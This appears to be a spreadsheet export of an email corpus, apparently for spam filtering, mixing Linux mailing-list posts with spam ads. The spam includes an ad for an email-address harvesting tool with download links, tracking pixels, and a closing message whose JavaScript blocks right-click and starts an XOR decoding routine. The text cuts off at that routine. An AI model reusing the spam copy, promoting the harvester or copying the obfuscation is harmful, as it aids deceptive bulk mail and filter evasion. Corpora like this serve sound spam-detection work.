 &gt; (NASDAQ: AKAM). As an early contributor at Akamai, he helped 
 &gt; develop the 
 &gt; company's initial positioning and led the technical development and 
 &gt; go-to-market activities for Akamai's flagship EdgeSuite service. 
 &gt; Taylor's early contribution helped position the service provider to 
 &gt; secure a $12.6 billion IPO. He has also held senior marketing 
 &gt; management 
 &gt; positions at Nortel Networks, Inc. and Bay Networks. Taylor was 
 &gt; previously an analyst at TeleChoice, Inc. and the Wide Area Networks 
 &gt; editor for Data Communications, a McGraw Hill publication. 
 &gt; Taylor holds 
 &gt; a B.A. in Print Journalism from the Pennsylvania State 
 &gt; University School 
 &gt; of Communications.
 &gt; 
 &gt; =================================================================
 &gt; Board of Advisors
 &gt; 
 &gt; Mark Hoover
 &gt; Mark Hoover is President and co-founder of Acuitive, Inc., a start-up 
 &gt; accelerator. With over 20 years experience in the networking 
 &gt; industry, 
 &gt; Hoover's expertise spans product development, marketing, and business 
 &gt; development. Before launching Acuitive, Hoover worked at AT&amp;T Bell 
 &gt; Laboratories, AT&amp;T Computer Systems, SynOptics, and Bay 
 &gt; Networks, where 
 &gt; he played a role in the development of key technologies, such as 
 &gt; 10-BASET, routing, FDDI, ATM, Ethernet switching, firewall, Internet 
 &gt; traffic management, and edge WAN switch industries.
 &gt; 
 &gt; George Kassabgi
 &gt; Currently Vice President of Engineering at BEA Systems, Mr. 
 &gt; Kassabgi has 
 &gt; held executive-level positions in engineering, sales and 
 &gt; marketing, and 
 &gt; has spearheaded leading-edge developments in the application server 
 &gt; marketplace since 1996. He is widely known for his regular speaking 
 &gt; engagements at JavaOne, as well as columns and contributions 
 &gt; in JavaPro, 
 &gt; Java Developer's Journal and other publications. In addition 
 &gt; to being a 
 &gt; venerated Java expert, George Kassabgi holds a patent on SmartObject 
 &gt; Technology, and authored the technical book Progress V8.
 &gt; 
 &gt; Marshall T. Rose
 &gt; Marshall T. Rose runs his own firm, Dover Beach Consulting, Inc. He 
 &gt; formerly held the position of the Internet Engineering Task 
 &gt; Force (IETF) 
 &gt; Area Director for Network Management, one of a dozen individuals who 
 &gt; oversaw the Internet's standardization process. Rose is the author of 
 &gt; several professional texts on subjects such as Internet Management, 
 &gt; Electronic Mail, and Directory Services, which have been published in 
 &gt; four languages. He is well known for his implementations of core 
 &gt; Internet technologies (such as POP, SMTP, and SNMP) and OSI 
 &gt; technologies 
 &gt; (such as X.500 and FTAM). Rose received a PhD in Information and 
 &gt; Computer Science from the University of California, Irvine, in 1984.
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Search for missing lynx
</t>
  </si>
  <si>
    <t xml:space="preserve">
 http://news.bbc.co.uk/1/hi/scotland/2515231.stm
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/46VHAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-01 at 10:51, Matthias Saou wrote:
 &gt; Sorry, this hasn't got much to do with rpm packages directly ;-)
 &gt; 
 &gt; My "builds" page is getting bigger and bigger, and quite messy as
 &gt; directories are listed in no particular order :
 &gt; http://freshrpms.net/builds/
 &gt; 
 &gt; What I'd need is to have last modification date of the directory displayed
 &gt; next to the directory name (sort of like "mplayer - Thu Aug 1 2002"), and
 &gt; the list ordered to have the most recent entries at the top.
 &gt; 
 &gt; Now, if there are php programmers on this list, I'd love to have their help
 &gt; on how to do this ;-) It must be quite simple to get the system mtime for
 &gt; the directory, it's the ordering that scares me a bit more.
 &gt; 
 &gt; Attached is the current code (please keep in mind that I'm not a
 &gt; programmer, it usually explains a lot ;-)).
 &gt; 
 You could try opening the directory with $filelist = popen("ls -t
 &lt;path/to/dir&gt;", "r"). This should give you the filenames in the
 directory sorted by mod.time. You can then open each filename, and read
 filemtime() to get the mod.time.
 Daniel
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] doolin
</t>
  </si>
  <si>
    <t xml:space="preserve">If you're not in Doolin, beg, borrow, or steal your way there before
 the LBW folk depart. It's far too much fun.
 Cheers,
 Waider. Just back.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me.
 "...we are in fact well and truly doomed. She says that if I leave now, 
  I can probably get a good head start before they realize that I'm gone."
                                                     - Jamie Zawinski
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Online credit repair.Do it yourself.            24898
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;HEAD&gt; 
 &lt;TITLE&gt;creditfix&lt;/TITLE&gt;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OUND=3Dhttp://365.sunshinehui.com/creditfix/email/background_arrow.gif WID=
 TH=3D400&gt; 
 &lt;TR&gt; 
 &lt;TD&gt;&lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1320&amp;mid=3D15000=
 &gt;&lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/banner_email.gif BO=
 RDER=3D0&gt;&lt;/A&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;BR&gt; 
 &lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1320&amp;mid=3D15000&gt;&lt;im=
 g src=3Dhttp://365.sunshinehui.com/creditfix/email/body_email.gif alt=3D""=
  border=3D"0"&gt;&lt;/A&gt; 
 &lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/thankyou.gif&gt; 
 &lt;BR&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;TR&gt; 
 &lt;TD&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;br&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1320-15000.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please 
 &lt;a href=3D"http://213.139.76.162/PHP/remove.php"&gt;Click here&lt;/a&gt; and enter =
 your 
 name into the remove box. If you have previously 
 unsubscribed and are still receiving this message, you may email our 
 &lt;a href=3D"mailto:nospamws@yahoo.com?Subject=3DAbuse Report"&gt;Abuse Control=
  Center&lt;/a&gt;, 
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, 
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt; 
 &lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/CENTER&gt; 
 &lt;BR&gt; 
 &lt;/BODY&gt; 
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Introducing Chase Platinum for Students with a 0% Introductory APR
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=iso-8859-1"&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;!-- saved from url=(0022)http://internet.e-mail --&gt;&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;chase&lt;/TITLE&gt;
 &lt;META content="text/html; charset=iso-8859-1" http-equiv=Content-Type&gt;
 &lt;META content="MSHTML 5.00.3502.5390" name=GENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width=571&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG height=1 src="images/spacer.gif" width=22&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="images/spacer.gif" width=108&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="images/spacer.gif" width=35&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="images/spacer.gif" width=200&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="images/spacer.gif" width=206&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD rowSpan=9&gt;&lt;/TD&gt;
     &lt;TD colSpan=4&gt;&lt;IMG height=49
       src="http://ad.linksynergy.com/fs-bin/show?id=Hjx6RN57GXo&amp;bids=32459.10000208&amp;type=4"
       width=549&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3&gt;&lt;IMG height=157
       src="http://ad.linksynergy.com/fs-bin/show?id=Hjx6RN57GXo&amp;bids=32459.10000209&amp;type=4"
       width=343&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=157
       src="http://ad.linksynergy.com/fs-bin/show?id=Hjx6RN57GXo&amp;bids=32459.10000210&amp;type=4"
       width=206&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3&gt;&lt;IMG height=255
       src="http://ad.linksynergy.com/fs-bin/show?id=Hjx6RN57GXo&amp;bids=32459.10000211&amp;type=4"
       width=343&gt;&lt;/TD&gt;
     &lt;TD rowSpan=7&gt;&lt;IMG height=427
       src="http://ad.linksynergy.com/fs-bin/show?id=Hjx6RN57GXo&amp;bids=32459.10000212&amp;type=4"
       width=206&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3&gt;&lt;IMG height=55
       src="http://ad.linksynergy.com/fs-bin/show?id=Hjx6RN57GXo&amp;bids=32459.10000213&amp;type=4"
       width=343&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=WBGHFNQUVETF&amp;ext=1"&gt;&lt;IMG border=0 height=37
       src="http://ad.linksynergy.com/fs-bin/show?id=Hjx6RN57GXo&amp;bids=32459.10000214&amp;type=4"
       width=108&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=2&gt;&lt;A
       href="http://theadmanager.com/server/c.asp?ad_key=WBGHFNQUVETF&amp;ext=1"&gt;&lt;IMG
       border=0 height=37
       src="http://ad.linksynergy.com/fs-bin/show?id=Hjx6RN57GXo&amp;bids=32459.10000215&amp;type=4"
       width=235&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=WBGHFNQUVETF&amp;ext=1"&gt;&lt;IMG border=0 height=13
       src="http://ad.linksynergy.com/fs-bin/show?id=Hjx6RN57GXo&amp;bids=32459.10000216"
       width=143&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD rowSpan=2&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=WBGHFNQUVETF&amp;ext=1"
       onclick="javascript: window.open
 ('https://www.MyChaseCard.com/StudentSweepstakes/StudentCardSweepsRules.html','Rules','width=450,height=450,resizable=yes,scrollbars=yes,scrolling=auto,status=yes,location=no,toolbar=no');"&gt;&lt;IMG
       border=0 height=13 src="http://ad.linksynergy.com/fs-bin/show?id=Hjx6RN57GXo&amp;bids=32459.10000217" width=143&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=WBGHFNQUVETF" width="1" height="1" hspace="0" vspace="0" border="0" alt="T"&gt;
 &lt;hr size="1" noshade&gt;
 &lt;font face="Arial" size="1" color="#000000"&gt;
 You are receiving this mailing because you are a
 member of MyTotalEmail.com and subscribed as:JM@NETNOTEINC.COM
 To unsubscribe &lt;a href="http://admanmail.com/subscription.asp?em=JM@NETNOTEINC.COM&amp;l=MTE"&gt;
 &lt;font face="arial" size="1" color="#000000"&gt;Click Here&lt;/a&gt;
 (http://admanmail.com/subscription.asp?em=JM@NETNOTEINC.COM&amp;l=MTE)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</si>
  <si>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defaulting to showing plaintext versions of e-mails
</t>
  </si>
  <si>
    <t xml:space="preserve">What's the trick again to have it default to showing text/plain instead of
 html?
 --Harlan
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-08-19 at 22:34, Angles Puglisi wrote:
 &gt; Matthias Saou (matthias@egwn.net) wrote*:
 &gt; &gt;Then why bother : The new Red Hat Linux beta "(null)" is now available and
 &gt; &gt;should be announced anytime now. It contains rpm 4.1-0.81.
 &gt; 
 &gt; Ahhh ... this is funny. Last night I upgraded to Limbo II (.93).
 &gt; 
 &gt; Installed Limbo II kernel, Installed libstdc++ from rawhide (rpm -ivh) so the
 &gt; newer apt would work, told apt it is OK to have multiple of libstdc++, copied
 &gt; the actual rawhide "libstdc++.so.5.0.0" file to another directory, removed that
 &gt; rawhide libstdc++ package, installed (rpm -ivh ) the Limbo II libstdc++ package
 &gt; (new apt does not like it), make that symlink "libstdc++.so.5" point to that
 &gt; rawhide file I moved earlier.
 You can just recompile the apt source RPM, if it's the newer one. (Such
 as mine). There's no dependancies on libstdc++ other than binary ones.
 Currently on release dwd2, which I'm using on my home rawhide box.
 (Obviously not production, since the old apt works fine on production
 boxes).
 Now... Does anyone know of a good way to delete "old" RPMS from a
 directory containing both "new" and "old" RPMS? Say I have
 blurb-0.1.0-1.i386.rpm, blurb-0.1.0-2.i386.rpm, and
 blurb-0.1.1-1.i386.rpm, and want to remove the blurb-0.1.0-* because of
 the presence of blurb-0.1.1-1? Anyone have a convenient script?
 Dave.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Live 20 years longer with HGH
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] can't find Razor/Client.pm
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 23, 2002 at 06:16:02PM -0400, Tabor J. Wells wrote:
 &gt; It's there. Scroll down on the downloads page. However you might
 &gt; consider going the other way and installing SpamAssassin's 2.40
 &gt; bleeding-edge code as Razor v2 has a lot of nice features over v1.
 To paraphrase something I heard once:
 Unless you like looking for a new job, never install a non-released or
 development-only version of software anywhere where the results of such
 code are important.
 ie: Don't run development code on a production machine. :)
 The problem isn't SA anyway, it looks for Razor1 and just keeps on
 going if it can't find it.  Something came up about amavis on the SA
 list where it looks for Razor itself...
 -- 
 Randomly Generated Tagline:
 "Duct tape is like the force; it has a light side &amp; a dark side, and it
  holds the universe together." - Zen Musings
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] dual keyboards
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all.
 Does anyone know how to set up dual keyboards(one is actually a stand-alone
 keypad)?
 Both keyboards have PS/2 connections and I want the keypad to be plugged in
 as the primary input device.  Then if the other keyboard is plugged in, that
 should take over.
 Possible?  Any possible hacks?
 Thanks!
 Carlos
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: OSXCon: Development Lessons from Bare Bones Software
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000215.html
 Date: 2002-10-02T17:02:15-08:00
 This talk is not supposed to be technical or marketing, but more of a ramble. 
 We'll see. :-) "Living above the Curve" BB is a strange company, as they've 
 been Mac-only are have been in business for over 10 years....
</t>
  </si>
  <si>
    <t xml:space="preserve">Geege Schuman wrote:
 &gt; less obscure haiku 
 &gt; 
 &gt; buy a puppy, ro!
 &gt; they are chick magnets. master
 &gt; ventriloquism.
 Reminds me of a Gary Larson cartoon,
 woman walking dog, man walking aligator,
 dog mostly eaten by aligator, thought cloud
 above man's head,
 "This is *such* a great way to meet chicks!"
 - Joe
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Apt 0.3 and 0.5
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Thomas wrote :
 &gt; Should I expect problems if my apt server is running RH 7.3/Apt 0.3 and
 &gt; some clients are coming on line and will be running RH 8.0/Apt 0.5? Do
 &gt; the two different version interoperate?
 No problems whatsoever. Currently apt.freshrpms.net is running 7.3 with apt
 0.3 and many 8.0 clients with 0.5 are using it.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 Load : 0.10 0.11 0.10, AC on-line, battery charging: 100% (1:47)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [MLB-WIRELESS] ADV: Harvest lots of E-mail addresses quickly !
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear melbwireless =2C
 =3CBODY bgColor=3D#ffccff=3E
 =3CTABLE border=3D0 cellPadding=3D0 cellSpacing=3D0 width=3D475=3E
   =3CTBODY=3E
   =3CTR=3E
     =3CTD align=3Dmiddle vAlign=3Dtop=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E=3CBR=3E
 =3CTABLE=3E
   =3CTBODY=3E
   =3CTR=3E
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E
     =3CTD bgColor=3D#b8ecff borderColor=3D#0000ff width=3D=2290%=22=3E=3CFONT color=3D#ff0000 
       face=3D=22Arial Black=22 
       size=3D6=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B Want   
       To Harvest A Lot Of Email&amp;nbsp=3B&amp;nbsp=3B Addresses In A Very Short Time=3F=3C=2FFONT=3E   
       =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial size=3D4=3EEasy Email   
       Searcher=3C=2FFONT=3E=3CFONT color=3D#ff00ff face=3DArial size=3D4=3E&amp;nbsp=3B is&amp;nbsp=3B   
       a&amp;nbsp=3B powerful&amp;nbsp=3B Email&amp;nbsp=3B software&amp;nbsp=3B&amp;nbsp=3B that&amp;nbsp=3B   
       harvests general Email lists from mail servers&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3CFONT   
       color=3D#0000ff face=3DArial size=3D4=3EEasy Email Searcher =3C=2FFONT=3E=3CFONT   
       color=3D#ff00ff face=3DArial size=3D4=3Ecan get 100=2C000 Email=3C=2FFONT=3E=3C=2FB=3E =3CFONT   
       color=3D#ff00ff face=3DArial size=3D4=3E=3CB=3Eaddresses directly from the Email   
       servers in only one hour!&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CUL=3E  
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E is a 32 bit Windows Program for e-mail marketing=2E It   
         is intended for easy and convenient search large e-mail address lists   
         from mail servers=2E The program can be operated on Windows 95=2F98=2FME=2F2000   
         and NT=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E =3C=2FB=3Esupport multi-threads =28up to 512   
         connections=29=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E has the ability&amp;nbsp=3B to reconnect to the mail   
         server if the server has disconnected and continue the searching at the   
         point where it has been interrupted=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E has an ergonomic interface that is easy to set up   
         and simple to use=2E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E  
       =3CP=3E=A1=A1=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3EEasy Email Searcher is an email   
       address searcher and bulk e-mail sender=2E It can verify more than 5500   
       email addresses per minute at only 56Kbps speed=2E It even allows you send   
       email to valid email address while searching=2E You can save the searching   
       progress and load it to resume work at your convenience=2E All you need to   
       do is just input an email address=2C and press the =22Search=22   
       button=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  
       =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3E=3CBR=3E=3C=2FFONT=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#FF00FF=22=3EVery 
       Low Price ! -------&amp;nbsp=3B Now=2C&amp;nbsp=3B The full version of Easy Email 
       Searcher only costs =3C=2Ffont=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#0000FF=22=3E$ 
       39=2E 95=3C=2Ffont=3E=3C=2FB=3E=3C=2FP=3E 
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CI=3EClick The Following Link To   
       Download The Demo =3A=3C=2FI=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E 
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA  
       href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=22=3EDownload Site   
       1=3C=2FA=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA   
       href=3D=22http=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=22=3EDownload Site   
       2=3C=2FA=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3C=2FB=3E=A1=A1=3CFONT color=3D#0000a0 face=3DArial 
       size=3D3=3E=3CSTRONG=3EIf&amp;nbsp=3B you can not download this program =2C&amp;nbsp=3B please   
       copy the following link into your URL =2C and then click =22 Enter=22 on your   
       Computer Keyboard=2E=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CP=3E=3CFONT size=3D2=3E=3CFONT color=3D#0000a0 face=3DArial size=3D3=3E=3CSTRONG=3EHere is the   
       download links=3A=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CDIV=3E  
       =3CP=3Ehttp=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=3C=2FP=3E  
       =3CP=3Ehttp=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=3C=2FP=3E=3C=2FFONT=3E=3C=2FDIV=3E  
       =3CP=3E=3C=2FP=3E=3C=2FTD=3E  
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E  
   =3CTR=3E  
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E  
     =3CTD bgColor=3D#0f95de width=3D=2290%=22=3E=3CFONT color=3D#ffffff   
       face=3D=22Verdana=2C Tahoma=2C Helvetica=2C SansSerif=22   
       size=3D1=3E=3CB=3EDisclaimer=3A=3C=2FB=3E=3CBR=3EWe are strongly against continuously sending   
       unsolicited emails to those who do not wish to receive our special   
       mailings=2E We have attained the services of an independent 3rd party to   
       overlook list management and removal services=2E This is not unsolicited   
       email=2E If you do not wish to receive further mailings=2C please click this   
       link =3CA href=3D=22 mailto=3Aremoval=40btamail=2Enet=2Ecn =22   
       target=3D=5Fblank=3E=3CFONT   
       color=3D#fdd32a=3E=3CB=3Emailto=3Aremoval=40btamail=2Enet=2Ecn  
       =3C=2FB=3E=3C=2FFONT=3E=3C=2FA=3E=2E&amp;nbsp=3B=3C=2FFONT=3E=3CB=3E=3CFONT class=3Ddisclaimer color=3D#000080  
       face=3DArial=3E=3CBR=3EThis message is a commercial advertisement=2E It is compliant  
       with all federal and state laws regarding email messages including the  
       California Business and Professions Code=2E We have provided the subject  
       line =22ADV=22 to provide you notification that this is a commercial  
       advertisement for persons over 18yrs old=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FTD=3E 
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E 
 =3CBR=3E
 To unsubscribe: send mail to majordomo@wireless.org.au
 with "unsubscribe melbwireless" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Do you Remember Me?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;head&gt;
 &lt;SCRIPT language=3DJavaScript1.2&gt;
 if (window.Event) // Only Netscape will have the CAPITAL E.
   document.captureEvents(Event.MOUSEUP); // catch the mouse up event
 function nocontextmenu()  // this function only applies to IE4, ignored ot=
 herwise.
 {
 	event.cancelBubble =3D true;
 	event.returnValue =3D false;
 	return false;
 }
 function norightclick(e)	// This function is used by all others
 {
 	if (window.Event)	// again, IE or NAV?
 	{
 		if (e.which =3D=3D 2 || e.which =3D=3D 3)
 			return false;
 	}
 	else
 		if (event.button =3D=3D 2 || event.button =3D=3D 3)
 		{
 			event.cancelBubble =3D true
 			event.returnValue =3D false;
 			return false;
 		}
 }
 document.oncontextmenu =3D nocontextmenu;		// for IE5+
 document.onmousedown =3D norightclick;		// for all others
 &lt;/SCRIPT&gt;
 &lt;SCRIPT&gt;
 var char_escaped=3D"%FF%FE%FD%FC%FB%FA%F9%F8%F7%F6%F5%F4%F3%F2%F1%F0%EF%EE=
 %ED%EC%EB%EA%E9%E8%E7%E6%E5%E4%E3%E2%E1%E0%DF%DE%DD%DC%DB%DA%D9%D8%D7%D6%D=
 5%D4%D3%D2%D1%D0%CF%CE%CD%CC%CB%CA%C9%C8%C7%C6%C5%C4%C3%C2%C1%C0%BF%BE%BD%=
 BC%BB%BA%B9%B8%B7%B6%B5%B4%B3%B2%B1%B0%AF%AE%AD%AC%AB%AA%A9%A8%A7%A6%A5%A4=
 %A3%A2%A1%A0%9F%9E%9D%9C%9B%9A%99%98%97%96%95%94%93%92%91%90%8F%8E%8D%8C%8=
 B%8A%89%88%87%86%85%84%83%82%81%80%7F%7E%7D%7C%7B%7A%79%78%77%76%75%74%73%=
 72%71%70%6F%6E%6D%6C%6B%6A%69%68%67%66%65%64%63%62%61%60%5F%5E%5D%5C%5B%5A=
 %59%58%57%56%55%54%53%52%51%50%4F%4E%4D%4C%4B%4A%49%48%47%46%45%44%43%42%4=
 1%40%3F%3E%3D%3C%3B%3A%39%38%37%36%35%34%33%32%31%30%2F%2E%2D%2C%2B%2A%29%=
 28%27%26%25%24%23%22%21%20%1F%1E%1D%1C%1B%1A%19%18%17%16%15%14%13%12%11%10=
 %0F%0E%0D%0C%0B%0A%09%08%07%06%05%04%03%02%01%00";
 var char_all    =3D unescape( char_escaped );
 function bound( min_val, value, max_val )
 {    if( value &lt; min_val ) {       value =3D min_val;   }
    if( value &gt; max_val ) {       value =3D max_val;    }
    return value;
 }
 function aton( string, index )
 {  
    index =3D bound( 0, index, string.length-1 );
    return char_all.indexOf( string.charAt( index ), 0 );
 }
 function ntoa( index )
 {  // Convert a number to a character.  The range is 0x00 to 0xFF inclusiv=
 e.
    // Revision 1.00, becd.
    index =3D bound( 0, index, 0xFF );
    return char_all.charAt( index );
 }
 function xor( data, pattern )
 { 
